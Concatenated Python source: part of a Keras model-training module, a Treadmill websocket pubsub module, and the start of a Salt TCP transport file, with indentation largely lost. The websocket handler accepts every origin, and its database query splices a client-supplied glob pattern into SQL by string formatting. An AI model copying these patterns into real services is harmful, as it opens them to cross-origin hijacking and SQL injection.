sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
                raise Exception('validation_data should be a tuple '
                                '(x_val, y_val, val_sample_weights) '
                                'or (x_val, y_val). Found: ' +
                                str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
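    # Editor's note (illustration, not part of the original source): a typical
    # single-input call to `fit`, holding out 10% of the data for validation:
    #
    #     history = model.fit(x_train, y_train,
    #                         batch_size=32, nb_epoch=10,
    #                         validation_split=0.1, shuffle=True)
    #     print(history.history['loss'], history.history['val_loss'])
    #
    # `x_train` and `y_train` are hypothetical Numpy arrays with equal sample counts.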
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
            batch_size: integer. Number of samples per evaluation batch.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
                (or list of Numpy arrays if the model has multiple inputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
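    # Editor's note (illustration, not part of the original source): a manual
    # training loop built on `train_on_batch`, useful for custom batch sampling:
    #
    #     for epoch in range(nb_epoch):
    #         for x_batch, y_batch in my_batch_iterator():  # hypothetical iterator
    #             loss = model.train_on_batch(x_batch, y_batch)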
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False,
initial_epoch=0):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
            nb_worker: maximum number of processes to spin up when using
                process-based threading.
            pickle_safe: if True, use process-based threading. Note that because
                this implementation relies on multiprocessing, you should not pass
                non-picklable arguments to the generator, as they can't easily be
                passed to child processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = x[0].shape[0]
elif type(x) is dict:
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size,
nb_worker=nb_worker,
pickle_safe=pickle_safe)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
        # Arguments
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
            nb_worker: maximum number of processes to spin up when using
                process-based threading.
            pickle_safe: if True, use process-based threading. Note that because
                this implementation relies on multiprocessing, you should not pass
                non-picklable arguments to the generator, as they can't easily be
                passed to child processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
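    # Editor's note (illustration, not part of the original source):
    #
    #     loss_and_metrics = model.evaluate_generator(my_val_generator(),
    #                                                 val_samples=1000)
    #
    # where `my_val_generator` is a hypothetical generator yielding (x, y) or
    # (x, y, sample_weight) tuples; the result order follows `model.metrics_names`.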
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
            nb_worker: maximum number of processes to spin up when using
                process-based threading.
            pickle_safe: if True, use process-based threading. Note that because
                this implementation relies on multiprocessing, you should not pass
                non-picklable arguments to the generator, as they can't easily be
                passed to child processes.
# Returns
Numpy array(s) of predictions.
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
__init__.py
"""Websocket API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import errno
import fnmatch
import glob
import heapq
import io
import json
import logging
import os
import re
import sqlite3
import threading
import time
import uuid
import tornado.websocket
import six
from six.moves import urllib_parse
from treadmill import dirwatch
from treadmill import utils
_LOGGER = logging.getLogger(__name__)
def make_handler(pubsub):
"""Make websocket handler factory."""
# pylint: disable=too-many-statements
class _WS(tornado.websocket.WebSocketHandler):
"""Base class contructor"""
def __init__(self, application, request, **kwargs):
"""Default constructor for tornado.websocket.WebSocketHandler"""
tornado.websocket.WebSocketHandler.__init__(
self, application, request, **kwargs
)
self._request_id = str(uuid.uuid4())
self._subscriptions = set()
def active(self, sub_id=None):
"""Return true if connection (and optional subscription) is active,
false otherwise.
If connection is not active, so are all of its subscriptions.
"""
if not self.ws_connection:
return False
return sub_id is None or sub_id in self._subscriptions
def open(self, *args, **kwargs):
"""Called when connection is opened.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection opened, remote ip: %s',
self._request_id, self.request.remote_ip)
def send_msg(self, msg):
"""Send message."""
_LOGGER.info('[%s] Sending message: %r', self._request_id, msg)
try:
self.write_message(msg)
except Exception: # pylint: disable=W0703
_LOGGER.exception('[%s] Error sending message: %r',
self._request_id, msg)
def send_error_msg(self, error_str, sub_id=None, close_conn=True):
"""Convenience method for logging and returning errors.
If sub_id is provided, it will be included in the error message and
subscription will be removed.
Note: this method will close the connection after sending back the
error, unless close_conn=False.
"""
error_msg = {'_error': error_str,
'when': time.time()}
if sub_id is not None:
error_msg['sub-id'] = sub_id
_LOGGER.info('[%s] Removing subscription %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
pass
self.send_msg(error_msg)
if close_conn:
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
def on_close(self):
"""Called when connection is closed.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection closed.', self._request_id)
def check_origin(self, origin):
"""Overriding check_origin method from base class.
            This method always returns True, i.e. all origins are allowed.
"""
parsed_origin = urllib_parse.urlparse(origin)
_LOGGER.debug('parsed_origin: %r', parsed_origin)
return True
def on_message(self, message):
"""Manage event subscriptions."""
if not pubsub:
_LOGGER.fatal('pubsub is not configured, ignore.')
self.send_error_msg('Fatal: unexpected error', close_conn=True)
_LOGGER.info('[%s] Received message: %s',
self._request_id, message)
sub_id = None
close_conn = True
try:
sub_msg = json.loads(message)
sub_id = sub_msg.get('sub-id')
close_conn = sub_id is None
if sub_msg.get('unsubscribe') is True:
_LOGGER.info('[%s] Unsubscribing %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
self.send_error_msg(
'Invalid subscription: %s' % sub_id,
close_conn=False
)
return
if sub_id and sub_id in self._subscriptions:
self.send_error_msg(
'Subscription already exists: %s' % sub_id,
close_conn=False
)
return
topic = sub_msg.get('topic')
impl = pubsub.impl.get(topic)
if not impl:
self.send_error_msg(
'Invalid topic: %s' % topic,
sub_id=sub_id, close_conn=close_conn
)
return
subscription = impl.subscribe(sub_msg)
since = sub_msg.get('since', 0)
snapshot = sub_msg.get('snapshot', False)
if sub_id and not snapshot:
_LOGGER.info('[%s] Adding subscription %s',
self._request_id, sub_id)
self._subscriptions.add(sub_id)
for watch, pattern in subscription:
pubsub.register(watch, pattern, self, impl, since, sub_id)
if snapshot and close_conn:
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
except Exception as err: # pylint: disable=W0703
self.send_error_msg(str(err),
sub_id=sub_id, close_conn=close_conn)
def data_received(self, chunk):
"""Passthrough of abstract method data_received.
"""
def on_event(self, filename, operation, _content):
"""Default event handler."""
_LOGGER.debug('%s %s', filename, operation)
return {'time': time.time(),
'filename': filename,
'op': operation}
return _WS
class DirWatchPubSub:
"""Pubsub dirwatch events."""
def __init__(self, root, impl=None, watches=None):
self.root = os.path.realpath(root)
self.impl = impl or {}
self.watches = watches or []
self.watcher = dirwatch.DirWatcher()
self.watcher.on_created = self._on_created
self.watcher.on_deleted = self._on_deleted
self.watcher.on_modified = self._on_modified
self.watch_dirs = set()
for watch in self.watches:
watch_dirs = self._get_watch_dirs(watch)
self.watch_dirs.update(watch_dirs)
for directory in self.watch_dirs:
_LOGGER.info('Added permanent dir watcher: %s', directory)
self.watcher.add_dir(directory)
self.ws = make_handler(self)
self.handlers = collections.defaultdict(list)
def register(self, watch, pattern, ws_handler, impl, since, sub_id=None):
"""Register handler with pattern."""
watch_dirs = self._get_watch_dirs(watch)
for directory in watch_dirs:
if ((not self.handlers[directory] and
directory not in self.watch_dirs)):
_LOGGER.info('Added dir watcher: %s', directory)
self.watcher.add_dir(directory)
# Store pattern as precompiled regex.
pattern_re = re.compile(
fnmatch.translate(pattern)
)
self.handlers[directory].append(
(pattern_re, ws_handler, impl, sub_id)
)
self._sow(watch, pattern, since, ws_handler, impl, sub_id=sub_id)
def _get_watch_dirs(self, watch):
pathname = os.path.realpath(os.path.join(self.root, watch.lstrip('/')))
return [path for path in glob.glob(pathname) if os.path.isdir(path)]
@utils.exit_on_unhandled
def _on_created(self, path):
"""On file created callback."""
_LOGGER.debug('created: %s', path)
self._handle('c', path)
@utils.exit_on_unhandled
def _on_modified(self, path):
"""On file modified callback."""
_LOGGER.debug('modified: %s', path)
self._handle('m', path)
@utils.exit_on_unhandled
def _on_deleted(self, path):
"""On file deleted callback."""
_LOGGER.debug('deleted: %s', path)
self._handle('d', path)
def _handle(self, operation, path):
"""Get event data and notify interested handlers of the change."""
directory, filename = os.path.split(path)
# Ignore (.) files, as they are temporary or "system".
if filename[0] == '.':
return
directory_handlers = self.handlers.get(directory, [])
handlers = [
(handler, impl, sub_id)
for pattern_re, handler, impl, sub_id in directory_handlers
if (handler.active(sub_id=sub_id) and
pattern_re.match(filename))
]
if not handlers:
return
if operation == 'd':
when = time.time()
content = None
else:
if '/trace/' in path or '/server-trace/' in path:
                    # Specialized handling of trace files (no need to stat/read):
                    # the timestamp is encoded in the filename, so the event can
                    # be emitted even if the file was already deleted (trace
                    # cleanup).
_, timestamp, _ = filename.split(',', 2)
when, content = float(timestamp), ''
else:
try:
when = os.stat(path).st_mtime
with io.open(path) as f:
content = f.read()
except (IOError, OSError) as err:
if err.errno == errno.ENOENT:
# If file was already deleted, ignore.
# It will be handled as 'd'.
return
raise
self._notify(handlers, path, operation, content, when)
def _notify(self, handlers, path, operation, content, when):
"""Notify interested handlers of the change."""
root_len = len(self.root)
for handler, impl, sub_id in handlers:
try:
payload = impl.on_event(path[root_len:],
operation,
content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=broad-except
_LOGGER.exception('Error handling event: %s, %s, %s, %s, %s',
path, operation, content, when, sub_id)
handler.send_error_msg(
'{cls}: {err}'.format(
cls=type(err).__name__,
err=str(err)
),
sub_id=sub_id,
close_conn=sub_id is None
)
def _db_records(self, db_path, sow_table, watch, pattern, since):
"""Get matching records from db."""
        # If the file does not exist, do not try to open it: opening the
        # connection would create the file, and there is no way to prevent
        # that until py3 (read-only URI connections).
#
if not os.path.exists(db_path):
_LOGGER.info('Ignore deleted db: %s', db_path)
return (None, None)
        # There is a rare race where the db file is deleted right HERE. In
        # that case the connection will open, but the tables will not be
        # there.
conn = sqlite3.connect(db_path)
        # Before Python 3.7, the GLOB pattern must not be passed as a bound
        # parameter, otherwise SQLite will not use the index.
select_stmt = """
SELECT timestamp, path, data FROM %s
WHERE directory GLOB ? AND name GLOB '%s' AND timestamp >= ?
ORDER BY timestamp
""" % (sow_table, pattern)
        # Return the open connection as well, since conn.execute returns a
        # lazy cursor iterator rather than a materialized list.
try:
return conn, conn.execute(select_stmt, (watch, since,))
except sqlite3.OperationalError as db_err:
            # Not sure if the file needs to be deleted at this point. As
            # sow_table is a parameter, passing a non-existent table could
            # cause a legitimate file to be deleted.
_LOGGER.info('Unable to execute: select from %s:%s ..., %s',
db_path, sow_table, str(db_err))
conn.close()
return (None, None)
def _sow(self, watch, pattern, since, handler, impl, sub_id=None):
"""Publish state of the world."""
if since is None:
since = 0
def _publish(item):
when, path, content = item
try:
payload = impl.on_event(str(path), None, content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=W0703
_LOGGER.exception('Error handling sow event: %s, %s, %s, %s',
path, content, when, sub_id)
handler.send_error_msg(str(err), sub_id=sub_id)
db_connections = []
fs_records = self._get_fs_sow(watch, pattern, since)
sow = getattr(impl, 'sow', None)
sow_table = getattr(impl, 'sow_table', 'sow')
try:
records = []
if sow:
dbs = sorted(glob.glob(os.path.join(self.root, sow, '*')))
for db in dbs:
if os.path.basename(db).startswith('.'):
continue
conn, db_cursor = self._db_records(
db, sow_table, watch, pattern, since
)
if db_cursor:
records.append(db_cursor)
# FIXME: Figure out pylint use before assign
#
# pylint: disable=E0601
if conn:
db_connections.append(conn)
records.append(fs_records)
# Merge db and fs records, removing duplicates.
prev_path = None
for item in heapq.merge(*records):
_when, path, _content = item
if path == prev_path:
continue
prev_path = path
_publish(item)
finally:
for conn in db_connections:
if conn:
conn.close()
def _get_fs_sow(self, watch, pattern, since):
"""Get state of the world from filesystem."""
root_len = len(self.root)
fs_glob = os.path.join(self.root, watch.lstrip('/'), pattern)
files = glob.glob(fs_glob)
items = []
for filename in files:
try:
stat = os.stat(filename)
with io.open(filename) as f:
content = f.read()
if stat.st_mtime >= since:
path, when = filename[root_len:], stat.st_mtime
items.append((when, path, content))
except (IOError, OSError) as err:
# Ignore deleted files.
if err.errno != errno.ENOENT:
raise
return sorted(items)
def _gc(self):
"""Remove disconnected websocket handlers."""
for directory in list(six.viewkeys(self.handlers)):
handlers = [
(pattern, handler, impl, sub_id)
for pattern, handler, impl, sub_id in self.handlers[directory]
if handler.active(sub_id=sub_id)
]
_LOGGER.info('Number of active handlers for %s: %s',
directory, len(handlers))
if not handlers:
_LOGGER.info('No active handlers for %s', directory)
self.handlers.pop(directory, None)
if directory not in self.watch_dirs:
# Watch is not permanent, remove dir from watcher.
self.watcher.remove_dir(directory)
else:
self.handlers[directory] = handlers
@utils.exit_on_unhandled
def run(self, once=False):
"""Run event loop."""
last_gc = time.time()
while True:
wait_interval = 10
if once:
wait_interval = 0
if self.watcher.wait_for_events(wait_interval):
self.watcher.process_events()
if (time.time() - last_gc) >= wait_interval:
self._gc()
last_gc = time.time()
if once:
break
@utils.exit_on_unhandled
def run_detached(self):
"""Run event loop in separate thread."""
event_thread = threading.Thread(target=self.run)
event_thread.daemon = True
event_thread.start()
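# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): a minimal example of
# wiring the pubsub to a hypothetical topic implementation, and the shape of a
# subscription message a client would send.  The 'state_impl' object and the
# '/state' topic are assumptions; the message keys ('topic', 'sub-id',
# 'since', 'snapshot') mirror what _WS.on_message() reads above.
def _example_pubsub_usage(root, state_impl):
    """Return a running DirWatchPubSub wired to a single topic (sketch)."""
    pubsub = DirWatchPubSub(root, impl={'/state': state_impl})
    pubsub.run_detached()
    # A connected websocket client would then send something like:
    example_subscription = json.dumps({
        'topic': '/state',
        'sub-id': str(uuid.uuid4()),
        'since': 0,
        'snapshot': False,
    })
    return pubsub, example_subscription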
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import urllib.parse
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.log.setup
import salt.master
import salt.payload
import salt.transport.base
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
class ClosingError(Exception):
""" """
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
